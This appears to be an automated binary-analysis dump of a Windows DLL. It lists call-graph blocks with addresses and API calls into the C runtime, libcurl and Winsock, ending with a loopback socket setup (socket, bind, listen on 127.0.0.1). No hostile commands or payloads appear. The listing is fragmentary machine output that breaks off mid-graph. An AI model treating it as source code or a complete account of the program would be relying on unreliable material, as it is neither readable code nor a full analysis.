18523->18557 18543 6b7cf6b5 SetLastError 18526->18543 18545 6b7cfb8f 18526->18545 18531 6b7cf6fc 18534 6b7cfb8f __dosmaperr 6 API calls 18531->18534 18532 6b7cf6e5 18533 6b7cfb8f __dosmaperr 6 API calls 18532->18533 18535 6b7cf6f3 18533->18535 18536 6b7cf708 18534->18536 18562 6b7cf7ea 18535->18562 18537 6b7cf70c 18536->18537 18538 6b7cf71d 18536->18538 18540 6b7cfb8f __dosmaperr 6 API calls 18537->18540 18568 6b7cf33d 18538->18568 18540->18535 18543->18510 18544 6b7cf7ea _free 12 API calls 18544->18543 18573 6b7cf953 18545->18573 18548 6b7cfbc9 TlsSetValue 18549 6b7cf6cd 18549->18543 18550 6b7cf78d 18549->18550 18555 6b7cf79a __dosmaperr 18550->18555 18551 6b7cf7da 18554 6b7c1f49 __dosmaperr 13 API calls 18551->18554 18552 6b7cf7c5 RtlAllocateHeap 18553 6b7cf6dd 18552->18553 18552->18555 18553->18531 18553->18532 18554->18553 18555->18551 18555->18552 18556 6b7d48a6 __dosmaperr 2 API calls 18555->18556 18556->18555 18558 6b7cf953 __dosmaperr 5 API calls 18557->18558 18559 6b7cfb6c 18558->18559 18560 6b7cfb87 TlsGetValue 18559->18560 18561 6b7cfb75 18559->18561 18561->18526 18563 6b7cf7f5 RtlFreeHeap 18562->18563 18564 6b7cf81e __dosmaperr 18562->18564 18563->18564 18565 6b7cf80a 18563->18565 18564->18543 18566 6b7c1f49 __dosmaperr 12 API calls 18565->18566 18567 6b7cf810 GetLastError 18566->18567 18567->18564 18587 6b7cf1d1 18568->18587 18574 6b7cf97d 18573->18574 18575 6b7cf981 18573->18575 18574->18548 18574->18549 18575->18574 18580 6b7cf88c 18575->18580 18578 6b7cf99b GetProcAddress 18578->18574 18579 6b7cf9ab __crt_fast_encode_pointer 18578->18579 18579->18574 18581 6b7cf89d __dosmaperr 18580->18581 18582 6b7cf8bb LoadLibraryExW 18581->18582 18584 6b7cf931 FreeLibrary 18581->18584 18585 6b7cf948 18581->18585 18586 6b7cf909 LoadLibraryExW 18581->18586 18582->18581 18583 6b7cf8d6 GetLastError 18582->18583 18583->18581 18584->18581 18585->18574 18585->18578 18586->18581 18588 6b7cf1dd __fassign 18587->18588 18601 6b7d2dc8 EnterCriticalSection 18588->18601 18590 
6b7cf1e7 18602 6b7cf217 18590->18602 18593 6b7cf2e3 18594 6b7cf2ef __fassign 18593->18594 18606 6b7d2dc8 EnterCriticalSection 18594->18606 18596 6b7cf2f9 18607 6b7cf4c4 18596->18607 18598 6b7cf311 18611 6b7cf331 18598->18611 18601->18590 18605 6b7d2e10 LeaveCriticalSection 18602->18605 18604 6b7cf205 18604->18593 18605->18604 18606->18596 18608 6b7cf4fa __fassign 18607->18608 18609 6b7cf4d3 __fassign 18607->18609 18608->18598 18609->18608 18614 6b7d5193 18609->18614 18728 6b7d2e10 LeaveCriticalSection 18611->18728 18613 6b7cf31f 18613->18544 18616 6b7d5213 18614->18616 18617 6b7d51a9 18614->18617 18619 6b7cf7ea _free 14 API calls 18616->18619 18640 6b7d5261 18616->18640 18617->18616 18622 6b7d51dc 18617->18622 18625 6b7cf7ea _free 14 API calls 18617->18625 18618 6b7d526f 18629 6b7d52cf 18618->18629 18641 6b7cf7ea 14 API calls _free 18618->18641 18620 6b7d5235 18619->18620 18621 6b7cf7ea _free 14 API calls 18620->18621 18623 6b7d5248 18621->18623 18626 6b7cf7ea _free 14 API calls 18622->18626 18639 6b7d51fe 18622->18639 18627 6b7cf7ea _free 14 API calls 18623->18627 18624 6b7cf7ea _free 14 API calls 18628 6b7d5208 18624->18628 18630 6b7d51d1 18625->18630 18631 6b7d51f3 18626->18631 18632 6b7d5256 18627->18632 18633 6b7cf7ea _free 14 API calls 18628->18633 18634 6b7cf7ea _free 14 API calls 18629->18634 18642 6b7d5d4f 18630->18642 18670 6b7d5e4d 18631->18670 18637 6b7cf7ea _free 14 API calls 18632->18637 18633->18616 18638 6b7d52d5 18634->18638 18637->18640 18638->18608 18639->18624 18682 6b7d5304 18640->18682 18641->18618 18643 6b7d5d60 18642->18643 18669 6b7d5e49 18642->18669 18644 6b7d5d71 18643->18644 18645 6b7cf7ea _free 14 API calls 18643->18645 18646 6b7d5d83 18644->18646 18647 6b7cf7ea _free 14 API calls 18644->18647 18645->18644 18648 6b7cf7ea _free 14 API calls 18646->18648 18650 6b7d5d95 18646->18650 18647->18646 18648->18650 18649 6b7d5da7 18651 6b7d5db9 18649->18651 18653 6b7cf7ea _free 14 API calls 18649->18653 18650->18649 18652 6b7cf7ea _free 14 API 
calls 18650->18652 18654 6b7d5dcb 18651->18654 18655 6b7cf7ea _free 14 API calls 18651->18655 18652->18649 18653->18651 18655->18654 18669->18622 18671 6b7d5e5a 18670->18671 18672 6b7d5eb2 18670->18672 18673 6b7d5e6a 18671->18673 18674 6b7cf7ea _free 14 API calls 18671->18674 18672->18639 18675 6b7d5e7c 18673->18675 18676 6b7cf7ea _free 14 API calls 18673->18676 18674->18673 18677 6b7d5e8e 18675->18677 18678 6b7cf7ea _free 14 API calls 18675->18678 18676->18675 18679 6b7d5ea0 18677->18679 18680 6b7cf7ea _free 14 API calls 18677->18680 18678->18677 18679->18672 18681 6b7cf7ea _free 14 API calls 18679->18681 18680->18679 18681->18672 18683 6b7d5311 18682->18683 18684 6b7d5330 18682->18684 18683->18684 18688 6b7d5eee 18683->18688 18684->18618 18687 6b7cf7ea _free 14 API calls 18687->18684 18689 6b7d532a 18688->18689 18690 6b7d5eff 18688->18690 18689->18687 18724 6b7d5eb6 18690->18724 18693 6b7d5eb6 __fassign 14 API calls 18694 6b7d5f12 18693->18694 18695 6b7d5eb6 __fassign 14 API calls 18694->18695 18725 6b7d5ee9 18724->18725 18726 6b7d5ed9 18724->18726 18725->18693 18726->18725 18727 6b7cf7ea _free 14 API calls 18726->18727 18727->18726 18728->18613 19123 6b779e30 19124 6b779e46 curl_multi_setopt curl_multi_add_handle 19123->19124 19126 6b779ef1 19124->19126 19127 6b779ef7 curl_multi_poll 19126->19127 19128 6b779f50 curl_multi_remove_handle 19126->19128 19127->19128 19129 6b779f11 curl_multi_perform 19127->19129 19129->19128 20451 6b772d20 20452 6b772d80 20451->20452 20453 6b772d6a 20451->20453 20454 6b7ae5d0 2 API calls 20452->20454 20455 6b7bdb71 __fassign 5 API calls 20453->20455 20457 6b772d8c 20454->20457 20456 6b772d7c 20455->20456 20458 6b7732c4 20457->20458 20461 6b772e4c 20457->20461 20459 6b7a05d0 74 API calls 20458->20459 20460 6b7732cf 20459->20460 20463 6b7bdb71 __fassign 5 API calls 20460->20463 20462 6b772e55 20461->20462 20470 6b772e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20461->20470 20464 6b773f40 204 API calls 20462->20464 20465 6b7732e4 
20463->20465 20466 6b772e68 20464->20466 20468 6b772e84 20466->20468 20471 6b774060 92 API calls 20466->20471 20469 6b7bdb71 __fassign 5 API calls 20468->20469 20472 6b772e96 20469->20472 20474 6b773130 20470->20474 20476 6b774740 SleepEx getsockopt WSAGetLastError 20470->20476 20480 6b773185 20470->20480 20481 6b7a06b0 74 API calls 20470->20481 20482 6b773025 WSASetLastError 20470->20482 20486 6b788450 21 API calls 20470->20486 20491 6b7aa0e0 53 API calls 20470->20491 20493 6b7746a0 207 API calls 20470->20493 20503 6b7a03a0 20470->20503 20471->20468 20473 6b7732af 20475 6b7bdb71 __fassign 5 API calls 20473->20475 20474->20473 20535 6b7746a0 20474->20535 20478 6b7732c0 20475->20478 20476->20470 20483 6b7728e0 closesocket 20480->20483 20487 6b7731dd 20480->20487 20481->20470 20482->20470 20483->20487 20485 6b77316d 20489 6b7aa0e0 53 API calls 20485->20489 20486->20470 20515 6b773f40 20487->20515 20488 6b7731f9 20488->20460 20492 6b77320c 20488->20492 20490 6b77326a 20489->20490 20494 6b7a05d0 74 API calls 20490->20494 20491->20470 20527 6b774060 20492->20527 20493->20470 20497 6b773288 20494->20497 20497->20473 20499 6b773297 20497->20499 20498 6b7bdb71 __fassign 5 API calls 20500 6b773226 20498->20500 20501 6b7bdb71 __fassign 5 API calls 20499->20501 20502 6b7732ab 20501->20502 20504 6b7a03c0 20503->20504 20506 6b7a03e7 20503->20506 20505 6b7a03c9 20504->20505 20504->20506 20574 6b7a04d0 20505->20574 20541 6b79fef0 20506->20541 20509 6b7a03d4 20510 6b7bdb71 __fassign 5 API calls 20509->20510 20511 6b7a03e3 20510->20511 20511->20470 20512 6b7bdb71 __fassign 5 API calls 20513 6b7a04c0 20512->20513 20513->20470 20514 6b7a0431 20514->20512 20516 6b77403b 20515->20516 20517 6b773f54 20515->20517 20516->20488 20518 6b774023 20517->20518 20519 6b773fcd 20517->20519 20520 6b7a05d0 74 API calls 20518->20520 20521 6b773fd4 20519->20521 20522 6b773ff1 20519->20522 20523 6b77402f 20520->20523 20580 6b7a75d0 20521->20580 20780 6b7a6f40 20522->20780 20523->20488 20526 6b773fec 
20526->20488 20528 6b77408d 20527->20528 20529 6b774080 20527->20529 21072 6b7736a0 20528->21072 21122 6b79cc20 20529->21122 20532 6b77409d 21125 6b7828a0 20532->21125 20536 6b774719 20535->20536 20537 6b7746cc 20535->20537 20538 6b773160 20536->20538 20539 6b7728e0 closesocket 20536->20539 20537->20536 20540 6b7740c0 207 API calls 20537->20540 20538->20453 20538->20485 20539->20538 20540->20537 20542 6b79ff10 20541->20542 20547 6b79ff2b 20541->20547 20542->20547 20554 6b79ff69 20542->20554 20543 6b7a0384 20545 6b7bdb71 __fassign 5 API calls 20543->20545 20544 6b7a0369 20548 6b7a037d Sleep 20544->20548 20549 6b7a0390 20545->20549 20546 6b79ff4d WSASetLastError 20551 6b7bdb71 __fassign 5 API calls 20546->20551 20547->20543 20547->20544 20547->20546 20550 6b7a0363 20547->20550 20548->20543 20549->20514 20550->20544 20550->20548 20552 6b79ff65 20551->20552 20552->20514 20553 6b7a00d9 20561 6b7a00e9 20553->20561 20566 6b7a0164 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20553->20566 20554->20553 20555 6b7a0100 WSASetLastError 20554->20555 20556 6b7a010e 20555->20556 20557 6b7bdb71 __fassign 5 API calls 20556->20557 20558 6b7a011b 20557->20558 20558->20514 20559 6b7a0237 select 20560 6b7a00fb 20559->20560 20560->20556 20573 6b7a027f 20560->20573 20561->20560 20562 6b7a0142 20561->20562 20563 6b7a0129 WSASetLastError 20561->20563 20565 6b7a013c 20561->20565 20564 6b7a0156 Sleep 20562->20564 20563->20560 20564->20560 20565->20562 20565->20564 20566->20559 20567 6b7a02a1 __WSAFDIsSet 20569 6b7a02df __WSAFDIsSet 20567->20569 20567->20573 20568 6b7a0350 20570 6b7bdb71 __fassign 5 API calls 20568->20570 20571 6b7a02fc __WSAFDIsSet 20569->20571 20569->20573 20572 6b7a035f 20570->20572 20571->20573 20572->20514 20573->20567 20573->20568 20573->20569 20573->20571 20575 6b7a04df 20574->20575 20576 6b7a0517 20574->20576 20577 6b7a04f9 Sleep 20575->20577 20578 6b7a04e9 WSASetLastError 20575->20578 20576->20509 20577->20576 20578->20509 20581 6b7a7642 __fassign 20580->20581 20582 
6b7a824c 20581->20582 20584 6b7a780d 20581->20584 20585 6b7a76dc 20581->20585 20586 6b7a7885 20581->20586 20583 6b7a06b0 74 API calls 20582->20583 20587 6b7a8264 20583->20587 20606 6b7a78e8 20584->20606 20893 6b7a07e0 recv 20584->20893 20590 6b7a76f8 20585->20590 20591 6b7a06b0 74 API calls 20585->20591 20588 6b7a0c20 94 API calls 20586->20588 20595 6b7bdb71 __fassign 5 API calls 20587->20595 20593 6b7a78a4 20588->20593 20592 6b7a771e 20590->20592 20603 6b7a06b0 74 API calls 20590->20603 20591->20590 20596 6b7a7743 20592->20596 20604 6b7a06b0 74 API calls 20592->20604 20593->20584 20605 6b7a78b0 20593->20605 20594 6b7a7847 20597 6b7a7858 20594->20597 20598 6b7a7909 20594->20598 20602 6b7a827f 20595->20602 20890 6b7a0c20 20596->20890 20599 6b7a7931 20597->20599 20600 6b7a7861 20597->20600 20598->20599 20601 6b7a790d 20598->20601 20599->20606 20615 6b7a7940 20599->20615 20616 6b7a7964 20599->20616 20608 6b7a05d0 74 API calls 20600->20608 20609 6b7a05d0 74 API calls 20601->20609 20602->20526 20603->20592 20604->20596 20610 6b7a05d0 74 API calls 20605->20610 20607 6b7bdb71 __fassign 5 API calls 20606->20607 20612 6b7a7905 20607->20612 20613 6b7a786c 20608->20613 20614 6b7a7918 20609->20614 20617 6b7a78bb 20610->20617 20612->20526 20620 6b7bdb71 __fassign 5 API calls 20613->20620 20621 6b7bdb71 __fassign 5 API calls 20614->20621 20622 6b7a05d0 74 API calls 20615->20622 20618 6b7a7c99 20616->20618 20624 6b7a79de 20616->20624 20651 6b7a7973 20616->20651 20623 6b7bdb71 __fassign 5 API calls 20617->20623 20634 6b7a7cb4 20618->20634 20654 6b7a7f30 __fassign 20618->20654 20626 6b7a7881 20620->20626 20627 6b7a792d 20621->20627 20628 6b7a794b 20622->20628 20629 6b7a78d0 20623->20629 20631 6b7a79e2 20624->20631 20632 6b7a7a53 20624->20632 20625 6b7a77ca 20625->20584 20630 6b7a77dd 20625->20630 20626->20526 20627->20526 20633 6b7bdb71 __fassign 5 API calls 20628->20633 20629->20526 20644 6b7bdb71 __fassign 5 API calls 20630->20644 20636 6b7a79eb 20631->20636 20637 6b7a7a2f 
20631->20637 20638 6b7a7a7b 20632->20638 20639 6b7a7a57 20632->20639 20640 6b7a7960 20633->20640 20635 6b7884a0 166 API calls 20634->20635 20641 6b7a7ccc 20635->20641 20896 6b7a8400 20636->20896 20645 6b7a05d0 74 API calls 20637->20645 20642 6b7a05d0 74 API calls 20638->20642 20646 6b7a05d0 74 API calls 20639->20646 20640->20526 20648 6b7a7cd8 20641->20648 20649 6b7a7e6d 20641->20649 20650 6b7a7a86 20642->20650 20643 6b7a802e 20647 6b7a05d0 74 API calls 20643->20647 20652 6b7a7809 20644->20652 20653 6b7a7a3a 20645->20653 20655 6b7a7a62 20646->20655 20657 6b7a8039 20647->20657 20658 6b7a7d03 20648->20658 20659 6b7a7ce0 20648->20659 20665 6b7bdb71 __fassign 5 API calls 20649->20665 20660 6b7bdb71 __fassign 5 API calls 20650->20660 20672 6b7a7ac3 20651->20672 20673 6b7a7ae7 __fassign 20651->20673 20652->20526 20666 6b7bdb71 __fassign 5 API calls 20653->20666 20661 6b7a06b0 74 API calls 20654->20661 20754 6b7a7dde 20654->20754 20667 6b7bdb71 __fassign 5 API calls 20655->20667 20669 6b7bdb71 __fassign 5 API calls 20657->20669 20681 6b7a7f00 20658->20681 20689 6b7a7d2d 20658->20689 20659->20587 20670 6b7a7ce9 20659->20670 20671 6b7a7a9b 20660->20671 20661->20754 20662 6b7a7a04 20662->20638 20674 6b7a7a0b 20662->20674 20663 6b7a7b47 __fassign 20678 6b7a0c20 94 API calls 20663->20678 20664 6b7a0c20 94 API calls 20675 6b7a7fe1 20664->20675 20676 6b7a7e7f 20665->20676 20677 6b7a7a4f 20666->20677 20668 6b7a7a77 20667->20668 20668->20526 20679 6b7a804e 20669->20679 20680 6b7bdb71 __fassign 5 API calls 20670->20680 20671->20526 20682 6b7a05d0 74 API calls 20672->20682 20673->20663 20684 6b7a7b23 20673->20684 20683 6b7a05d0 74 API calls 20674->20683 20685 6b7a8011 20675->20685 20693 6b7a7fed 20675->20693 20676->20526 20677->20526 20686 6b7a7b9b 20678->20686 20679->20526 20687 6b7a7cff 20680->20687 20688 6b7a05d0 74 API calls 20681->20688 20690 6b7a7ace 20682->20690 20691 6b7a7a16 20683->20691 20692 6b7a05d0 74 API calls 20684->20692 20685->20606 20685->20643 20701 6b7a8052 
20685->20701 20694 6b7a7bcb 20686->20694 20702 6b7a7ba7 20686->20702 20687->20526 20695 6b7a7f11 20688->20695 20696 6b788450 21 API calls 20689->20696 20697 6b7bdb71 __fassign 5 API calls 20690->20697 20698 6b7bdb71 __fassign 5 API calls 20691->20698 20699 6b7a7b2e 20692->20699 20700 6b7a05d0 74 API calls 20693->20700 20694->20606 20716 6b7a07e0 2 API calls 20694->20716 20703 6b7bdb71 __fassign 5 API calls 20695->20703 20704 6b7a7d3f curl_msnprintf 20696->20704 20705 6b7a7ae3 20697->20705 20706 6b7a7a2b 20698->20706 20707 6b7bdb71 __fassign 5 API calls 20699->20707 20708 6b7a7ff8 20700->20708 20710 6b7a07e0 2 API calls 20701->20710 20709 6b7a05d0 74 API calls 20702->20709 20711 6b7a7f26 20703->20711 20722 6b7a7d9f 20704->20722 20723 6b7a7e83 20704->20723 20705->20526 20706->20526 20712 6b7a7b43 20707->20712 20713 6b7bdb71 __fassign 5 API calls 20708->20713 20714 6b7a7bb2 20709->20714 20715 6b7a808d 20710->20715 20711->20526 20712->20526 20718 6b7a800d 20713->20718 20719 6b7bdb71 __fassign 5 API calls 20714->20719 20720 6b7a80c3 20715->20720 20725 6b7a809f 20715->20725 20721 6b7a7c1a 20716->20721 20718->20526 20724 6b7a7bc7 20719->20724 20720->20606 20727 6b7a821a 20720->20727 20737 6b7a80de 20720->20737 20738 6b7a8102 20720->20738 20726 6b7a7c50 20721->20726 20733 6b7a7c2c 20721->20733 20728 6b7a06b0 74 API calls 20722->20728 20729 6b7a7e88 20723->20729 20730 6b7a7ed7 20723->20730 20724->20526 20732 6b7a05d0 74 API calls 20725->20732 20726->20606 20726->20618 20726->20727 20743 6b7a7c6d 20726->20743 20734 6b7a05d0 74 API calls 20727->20734 20728->20754 20747 6b7a06b0 74 API calls 20729->20747 20731 6b7a05d0 74 API calls 20730->20731 20731->20754 20735 6b7a80aa 20732->20735 20736 6b7a05d0 74 API calls 20733->20736 20739 6b7a8225 20734->20739 20740 6b7bdb71 __fassign 5 API calls 20735->20740 20741 6b7a7c37 20736->20741 20742 6b7a05d0 74 API calls 20737->20742 20744 6b7a8109 20738->20744 20745 6b7a8145 20738->20745 20746 6b7bdb71 __fassign 5 API calls 20739->20746 
20748 6b7a80bf 20740->20748 20749 6b7bdb71 __fassign 5 API calls 20741->20749 20750 6b7a80e9 20742->20750 20751 6b7a05d0 74 API calls 20743->20751 20752 6b7a05d0 74 API calls 20744->20752 20759 6b7a81f2 20745->20759 20762 6b7a814c 20745->20762 20753 6b7a823a 20746->20753 20747->20754 20748->20526 20755 6b7a7c4c 20749->20755 20756 6b7bdb71 __fassign 5 API calls 20750->20756 20757 6b7a7c80 20751->20757 20758 6b7a8123 20752->20758 20753->20526 20754->20643 20754->20664 20755->20526 20760 6b7a80fe 20756->20760 20761 6b7bdb71 __fassign 5 API calls 20757->20761 20766 6b7bdb71 __fassign 5 API calls 20758->20766 20764 6b7a05d0 74 API calls 20759->20764 20760->20526 20765 6b7a7c95 20761->20765 20762->20582 20763 6b7a07e0 2 API calls 20762->20763 20767 6b7a81bc 20763->20767 20768 6b7a81fd 20764->20768 20765->20526 20769 6b7a8141 20766->20769 20770 6b7a81c9 20767->20770 20771 6b7a8216 20767->20771 20772 6b7bdb71 __fassign 5 API calls 20768->20772 20769->20526 20773 6b7a823e 20770->20773 20774 6b7a81ce 20770->20774 20771->20727 20771->20773 20775 6b7a8212 20772->20775 20773->20582 20773->20606 20776 6b7a05d0 74 API calls 20774->20776 20775->20526 20777 6b7a81d9 20776->20777 20778 6b7bdb71 __fassign 5 API calls 20777->20778 20779 6b7a81ee 20778->20779 20779->20526 20781 6b7a6f92 20780->20781 20784 6b7a71fa 20781->20784 20785 6b7a6fce 20781->20785 20786 6b7a70ed 20781->20786 20798 6b7a708d 20781->20798 20821 6b7a7319 20781->20821 20827 6b7a7277 20781->20827 20847 6b7a73ec 20781->20847 20782 6b7a7403 20787 6b7a05d0 74 API calls 20782->20787 20783 6b7a7427 20788 6b7a7547 20783->20788 20789 6b7a7437 20783->20789 20790 6b7a05d0 74 API calls 20784->20790 20793 6b7a7001 20785->20793 20807 6b7a06b0 74 API calls 20785->20807 21068 6b787d40 20786->21068 20797 6b7a740e 20787->20797 20805 6b7a05d0 74 API calls 20788->20805 20799 6b7a74b9 20789->20799 20800 6b7a743e 20789->20800 20801 6b7a7472 20789->20801 20802 6b7a7500 20789->20802 20803 6b7a7208 20790->20803 20791 6b7a0c20 94 API calls 
20804 6b7a72c5 20791->20804 20796 6b7a06b0 74 API calls 20793->20796 20794 6b7a07e0 2 API calls 20795 6b7a737c 20794->20795 20813 6b7a73b6 20795->20813 20814 6b7a7386 20795->20814 20830 6b7a7015 20796->20830 20808 6b7bdb71 __fassign 5 API calls 20797->20808 20798->20798 20819 6b7a70c9 20798->20819 20826 6b7a7221 __fassign 20798->20826 20815 6b7a05d0 74 API calls 20799->20815 20809 6b7a06b0 74 API calls 20800->20809 20811 6b7a05d0 74 API calls 20801->20811 20816 6b7a05d0 74 API calls 20802->20816 20810 6b7bdb71 __fassign 5 API calls 20803->20810 20804->20821 20835 6b7a72d1 20804->20835 20817 6b7a7575 20805->20817 20806 6b7a70fc 20812 6b7a710a 20806->20812 20834 6b7a7195 20806->20834 20807->20793 20818 6b7a7423 20808->20818 20822 6b7a7456 20809->20822 20823 6b7a721d 20810->20823 20824 6b7a74a0 20811->20824 20825 6b7a06b0 74 API calls 20812->20825 20829 6b7a73de 20813->20829 20832 6b7a73ba 20813->20832 20828 6b7a738b curl_easy_strerror 20814->20828 20814->20829 20831 6b7a74e7 20815->20831 20833 6b7a752e 20816->20833 20836 6b7bdb71 __fassign 5 API calls 20817->20836 20818->20526 20838 6b7a05d0 74 API calls 20819->20838 20820 6b7a7326 20839 6b7bdb71 __fassign 5 API calls 20820->20839 20821->20794 20821->20820 20840 6b7bdb71 __fassign 5 API calls 20822->20840 20823->20526 20841 6b7bdb71 __fassign 5 API calls 20824->20841 20860 6b7a7085 20825->20860 20826->20827 20863 6b7a72f5 20826->20863 20827->20791 20842 6b7a05d0 74 API calls 20828->20842 20829->20820 20829->20847 20830->20798 20843 6b7884a0 166 API calls 20830->20843 20844 6b7bdb71 __fassign 5 API calls 20831->20844 20845 6b7a05d0 74 API calls 20832->20845 20846 6b7bdb71 __fassign 5 API calls 20833->20846 20859 6b7a71ad 20834->20859 20834->20860 20848 6b7a05d0 74 API calls 20835->20848 20837 6b7a758a 20836->20837 20837->20526 20850 6b7a70d4 20838->20850 20851 6b7a7343 20839->20851 20852 6b7a746e 20840->20852 20853 6b7a74b5 20841->20853 20854 6b7a739d 20842->20854 20855 6b7a7041 20843->20855 20856 6b7a74fc 
20844->20856 20857 6b7a73c5 20845->20857 20858 6b7a7543 20846->20858 20847->20782 20847->20783 20849 6b7a72dc 20848->20849 20861 6b7bdb71 __fassign 5 API calls 20849->20861 20862 6b7bdb71 __fassign 5 API calls 20850->20862 20851->20526 20852->20526 20853->20526 20864 6b7bdb71 __fassign 5 API calls 20854->20864 20865 6b7a704d 20855->20865 20866 6b7a71b5 20855->20866 20856->20526 20867 6b7bdb71 __fassign 5 API calls 20857->20867 20858->20526 20859->20866 20868 6b7a706f 20859->20868 20860->20784 20874 6b788450 21 API calls 20860->20874 20870 6b7a72f1 20861->20870 20872 6b7a70e9 20862->20872 20871 6b7a05d0 74 API calls 20863->20871 20873 6b7a73b2 20864->20873 20865->20860 20875 6b7a7055 20865->20875 20869 6b7bdb71 __fassign 5 API calls 20866->20869 20876 6b7a73da 20867->20876 20877 6b7bdb71 __fassign 5 API calls 20868->20877 20878 6b7a71c7 20869->20878 20870->20526 20879 6b7a7300 20871->20879 20872->20526 20873->20526 20880 6b7a7159 20874->20880 20885 6b7a06b0 74 API calls 20875->20885 20876->20526 20881 6b7a7081 20877->20881 20878->20526 20882 6b7bdb71 __fassign 5 API calls 20879->20882 20883 6b7a71cb 20880->20883 20884 6b7a7165 20880->20884 20881->20526 20887 6b7a7315 20882->20887 20886 6b7a05d0 74 API calls 20883->20886 20888 6b7a06b0 74 API calls 20884->20888 20885->20868 20889 6b7a7193 20886->20889 20887->20526 20888->20889 20889->20784 20889->20798 21001 6b7a09f0 20890->21001 20892 6b7a0c45 20892->20605 20892->20625 20894 6b7a07fb WSAGetLastError 20893->20894 20895 6b7a081e 20893->20895 20894->20594 20895->20594 20897 6b7a8456 ___from_strstr_to_strchr 20896->20897 20898 6b7a8478 20897->20898 20901 6b7a84ab 20897->20901 20899 6b7a8524 20898->20899 20900 6b7a8495 20898->20900 21024 6b7a9190 20899->21024 20902 6b7bdb71 __fassign 5 API calls 20900->20902 20906 6b7a84f8 curl_msnprintf 20901->20906 20934 6b7a8988 20901->20934 20903 6b7a84a7 20902->20903 20903->20662 20904 6b7bdb71 __fassign 5 API calls 20907 6b7a89cb 20904->20907 20906->20899 20907->20662 20908 
6b7a8609 20909 6b7a863e 20908->20909 20910 6b7a8610 20908->20910 21036 6b79a660 ioctlsocket 20909->21036 20912 6b7a05d0 74 API calls 20910->20912 20996 6b7a861b 20912->20996 20913 6b7a86ea htons 20915 6b7a0c20 94 API calls 20913->20915 20914 6b7bdb71 __fassign 5 API calls 20916 6b7a9184 20914->20916 20935 6b7a8646 20915->20935 20916->20662 20917 6b7a8890 21037 6b7a9a80 GetLastError 20917->21037 20918 6b7a890d 20922 6b7a05d0 74 API calls 20918->20922 20921 6b7a8330 20 API calls 20921->20935 20922->20996 20924 6b7a0c20 94 API calls 20924->20935 20925 6b7a8a1d 20926 6b7a05d0 74 API calls 20925->20926 20926->20996 20927 6b7a89cf 20930 6b7a05d0 74 API calls 20927->20930 20928 6b7a8820 htons 20928->20935 20929 6b7a8a4b 20931 6b7a9190 82 API calls 20929->20931 20930->20996 20932 6b7a8a94 20931->20932 20936 6b7a8a9b 20932->20936 20937 6b7a8acf 20932->20937 20934->20904 20935->20913 20935->20917 20935->20918 20935->20921 20935->20924 20935->20925 20935->20927 20935->20928 20935->20929 20935->20934 20940 6b7a896c 20935->20940 20942 6b7a05d0 74 API calls 20936->20942 20938 6b7a06b0 74 API calls 20937->20938 20943 6b7a8ae0 20938->20943 20941 6b7a05d0 74 API calls 20940->20941 20941->20996 20942->20996 20944 6b7a06b0 74 API calls 20943->20944 20996->20914 21002 6b7a0b1a send 21001->21002 21003 6b7a0a54 21001->21003 21004 6b7a0b3e WSAGetLastError 21002->21004 21015 6b7a0b8e 21002->21015 21003->21002 21008 6b7a03a0 16 API calls 21003->21008 21005 6b7a0b69 21004->21005 21006 6b7a0b4e 21004->21006 21010 6b7aa0e0 53 API calls 21005->21010 21009 6b7bdb71 __fassign 5 API calls 21006->21009 21007 6b7bdb71 __fassign 5 API calls 21011 6b7a0bb4 21007->21011 21017 6b7a0a85 21008->21017 21012 6b7a0b65 21009->21012 21013 6b7a0b7b 21010->21013 21011->20892 21012->20892 21014 6b7a05d0 74 API calls 21013->21014 21014->21015 21015->21007 21016 6b7a0abe 21018 6b7a0b13 21016->21018 21019 6b7a0af5 recv 21016->21019 21017->21002 21017->21016 21021 6b7a0ad1 21017->21021 21018->21002 21019->21002 
21020 6b7a0b0e 21019->21020 21020->21002 21022 6b7bdb71 __fassign 5 API calls 21021->21022 21023 6b7a0ae7 21022->21023 21023->20892 21025 6b7a91ff 21024->21025 21026 6b7a91b2 21024->21026 21027 6b7bdb71 __fassign 5 API calls 21025->21027 21026->21025 21029 6b7a91c7 21026->21029 21028 6b7a920d 21027->21028 21028->20908 21030 6b7a9a80 55 API calls 21029->21030 21031 6b7a91d9 21030->21031 21032 6b7a05d0 74 API calls 21031->21032 21033 6b7a91e7 21032->21033 21034 6b7bdb71 __fassign 5 API calls 21033->21034 21035 6b7a91fb 21034->21035 21035->20908 21036->20935 21038 6b7c1f49 __dosmaperr 14 API calls 21037->21038 21039 6b7a9ab0 21038->21039 21040 6b7a9abc 21039->21040 21045 6b7a9acf 21039->21045 21041 6b7bdb71 __fassign 5 API calls 21040->21041 21043 6b7a9acb 21041->21043 21042 6b7a9db6 21044 6b7a9dbb curl_msnprintf 21042->21044 21046 6b7aa770 49 API calls 21044->21046 21045->21042 21045->21044 21048 6b7a9e87 curl_msnprintf 21045->21048 21049 6b7a9e99 _strncpy 21048->21049 21069 6b787d53 21068->21069 21070 6b788840 77 API calls 21069->21070 21071 6b787d6c 21070->21071 21071->20806 21073 6b7738bf 21072->21073 21074 6b7736c6 21072->21074 21075 6b7bdb71 __fassign 5 API calls 21073->21075 21074->21073 21076 6b7736e0 getpeername 21074->21076 21077 6b773999 21075->21077 21078 6b773743 __fassign 21076->21078 21079 6b773708 WSAGetLastError 21076->21079 21077->20532 21082 6b773760 getsockname 21078->21082 21080 6b7aa0e0 53 API calls 21079->21080 21081 6b773722 21080->21081 21083 6b7a05d0 74 API calls 21081->21083 21084 6b7737b7 21082->21084 21085 6b77377c WSAGetLastError 21082->21085 21087 6b77372f 21083->21087 21086 6b772840 23 API calls 21084->21086 21088 6b7aa0e0 53 API calls 21085->21088 21090 6b7737d7 21086->21090 21091 6b7bdb71 __fassign 5 API calls 21087->21091 21089 6b773796 21088->21089 21092 6b7a05d0 74 API calls 21089->21092 21093 6b773820 21090->21093 21094 6b7737de 21090->21094 21095 6b77373f 21091->21095 21096 6b7737a3 21092->21096 21097 6b772840 23 API calls 

Control-flow Graph (entry block 6b7a6d50; rendered graph and edge list not preserved)
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 6B7A6D80
• htonl.WS2_32(7F000001), ref: 6B7A6DA3
• setsockopt.WS2_32(00000000,0000FFFF,00000004,00000001,00000004), ref: 6B7A6DCD
• bind.WS2_32(00000000,?,00000010), ref: 6B7A6DE3
• getsockname.WS2_32(00000000,?,00000010), ref: 6B7A6DFB
• listen.WS2_32(00000000,00000001), ref: 6B7A6E0D
• socket.WS2_32(00000002,00000001,00000000), ref: 6B7A6E22
